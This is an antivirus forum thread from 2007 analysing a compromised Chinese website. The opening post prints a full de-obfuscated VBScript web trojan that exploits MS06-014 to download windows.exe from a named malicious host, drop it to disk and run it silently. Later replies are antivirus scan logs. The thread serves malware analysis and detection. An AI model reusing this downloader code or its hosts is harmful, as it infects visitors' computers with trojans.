毒网+毒

显示全部楼层 · 发表于 2007-4-7 15:42:38

看到http://bbs.kafan.cn/viewthread.php?tid=71193&extra=page%3D1里面的那个http://www.cckey.cn上面有两只马，于是想它的主页应该也有吧，也是就上去看看了，果然不出我所料

http://www.cckey.cn/index.htm上面有几个调用的，除了广告和丢失的就是http://www.cckey.cn/cc6/count.js了
里面调用http://www.hyap98.com/123/adnt.htm，unescape侍侯得：

<SCRIPT>var Words="<script language="VBScript">
On Error Resume Next
QnxyX="http://www.hyap98.com/123/windows.exe"
Set RJURL = document.createElement("object")
ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":xxx="Microsoft.X":mmm="MLHTTp"
RJURL.SetAttribute "classid", ccc&lll&sss&iii&ddd
OOBnPl=xxx&mmm
Set MKHbx = RJURL.CreateObject(OOBnPl,"")
MKHbx.Open "GET", QnxyX, False
MKHbx.Send
MQWLa="~I7PRUGI1VAC.CoM"
SEiDu="~V5SFDYCLNTK.VbS"
XpTvd="~V5SFDYCLNTK.VbS"
SS="Scripting."
cc="FileSyst"
rr="emObject"
Set Kpzwb = RJURL.createobject(SS&cc&rr,"")
Set SrHOx = Kpzwb.GetSpecialFolder(2)
MQWLa=Kpzwb.BuildPath(SrHOx,MQWLa)
SEiDu=Kpzwb.BuildPath(SrHOx,SEiDu)
RR="Adod"
NN="b.stream"
UoNfL=RR&NN
Set HSREb = RJURL.createobject(UoNfL,"")
HSREb.type=1
HSREb.Open
HSREb.Write MKHbx.ResponseBody
HSREb.Savetofile MQWLa,2
HSREb.Close
HSREb.Type=2
HSREb.Open
HSREb.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&MQWLa&""")"&vbCrLf&"Set Shell = Nothing"
HSREb.Savetofile SEiDu,2
HSREb.Savetofile "c:\\NTDETECT.EXE",2
HSREb.Close
WSjog="Shell.Applica"
Set Run = RJURL.createobject(WSjog&"tion","")
Run.ShellExecute SEiDu,"","","Open",0
</script></html><script type="text/jscript">function init() {document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
document.writeln("<P>Additionally, a 404 Not Found");
document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");
document.writeln("<\/BODY>");}window.onload = init;
</script>

复制代码

明显一个ms06-014网马，挂了http://www.hyap98.com/123/windows.exe
count.js里面还有一个指针漏洞的网马，http://www.hyap98.com/123/ad.png同样挂了windows.exe

之后http://www.cckey.cn/index.htm跳转到http://www.cckey.cn/index3.htm，里面的http://www.hyap98.com/123/yun.js 和上面count.js挂的是一样的，而http://www.chinaeve.com/game/ad.htm则无法下载。

另有广告页面几个，不贴了

样本几个

显示全部楼层 · 发表于 2007-4-7 15:43:35

已检测到: 恶意程序 Exploit.Win32.IMG-ANI.k URL: http:/bbs.kafan.cn/attachment.php?aid=53153/ad.png

显示全部楼层 · 发表于 2007-4-7 15:48:14

Scan performed at: 2007-4-7 15:48:00
Scanning Log
NOD32 version 2172 (20070407) NT
Command line: C:\Documents and Settings\EQ2\桌面\a
Operating memory - is OK

Date: 7.4.2007 Time: 15:48:04
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\a\
C:\Documents and Settings\EQ2\桌面\a\ad.png - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\a\windows.exe - Win32/Pacex.Gen virus
Number of scanned files: 7
Number of threats found: 2
Number of files cleaned: 2
Time of completion: 15:48:04 Total scanning time: 0 sec (00:00:00)

显示全部楼层 · 发表于 2007-4-7 15:50:01

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\a.rar'
C:\Documents and Settings\morgan\My Documents\
  a.rar
[0] Archive type: RAR
--> www.cckey.cn.htm
--> windows.exe
      [DETECTION] Is the Trojan horse TR/Drop.Ag.344576.B
      [WARNING] Infected files in archives cannot be repaired!
--> ad.png
      [DETECTION] Contains signature of the exploits EXP/Ani.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> adnt.htm
--> count.js
--> index3.htm
--> yun.js
      [WARNING] The file was ignored!

显示全部楼层 · 发表于 2007-4-7 16:16:27

咖啡监控到一个

反病毒专家 AntiVirusKit 2006 扫描病毒日志记录
版本 16.0.7
双引擎反病毒签名 2007-4-5
开始时间: 2007-4-7 16:17
引擎: KAV 引擎 (AVK 16.10153), BD 引擎 (BD 16.6079)
高启发式: 打开
压缩文件: 打开
系统区域: 打开

扫描系统区域...
扫描所选择的目录和文件...
对象: ad.png
在压缩档案里: C:\Documents and Settings\Administrator\桌面\a.rar
Status: 已发现病毒
病毒: Exploit.Win32.IMG-ANI.k (KAV 引擎), Exploit.Win32.MS05-002.Gen (BD 引擎)
对象: a.rar
路径: C:\Documents and Settings\Administrator\桌面
Status: 已发现病毒
病毒: Exploit.Win32.IMG-ANI.k (KAV 引擎), Exploit.Win32.MS05-002.Gen (BD 引擎)
扫描完成: 2007-4-7 16:17
已检查 1 个文件
已发现 1 个染毒文件
发现 0 个可疑文件

[ 本帖最后由 worker321 于 2007-4-7 16:17 编辑 ]

显示全部楼层 · 发表于 2007-4-7 16:21:37

http://bbs.kafan.cn
支持一下

显示全部楼层 · 发表于 2007-4-7 16:21:51

显示全部楼层 · 发表于 2007-4-7 16:30:04

BitDefender Antivirus Plus v10
a.rar=>windows.exe Suspect: GenPack:Generic.Malware.WB.E3E9180D
a.rar=>ad.png Infected: Exploit.Win32.MS05-002.Gen

显示全部楼层 · 发表于 2007-4-7 16:38:50

风暴胜者V2 测试版本(http://www.v0day.com)
_________您的安全是我们的责任_______________
载入病毒库…进行整理…分配内存…可以使用

===============================================
___________病毒查杀结果__________________

===============================================

2002年4月7日16时38分20秒开始查杀C:\Documents and Settings\Administrator\桌面\新建文件夹\a
C:\Documents and Settings\Administrator\桌面\新建文件夹\a\windows.exe 发现未知可疑文件:Win32.Nop 4fi6 操作:阻止运行
=========================================

_________文件性质分析结果________________
"带壳"仅指文件性质,仅供专业人员分析使用。

C:\Documents and Settings\Administrator\桌面\新建文件夹\a\windows.exe 带壳文件:UPX加壳
-----------------------------------------

2002年4月7日16时38分20秒收起线程…100% 查杀完毕！
扫描文件：2查杀病毒：1

显示全部楼层 · 发表于 2007-4-7 19:17:00

PCC掃到一隻

毒网+毒

本帖子中包含更多资源

nod32貌似很少理财脚本和html。。。

本帖子中包含更多资源

avast!

本帖子中包含更多资源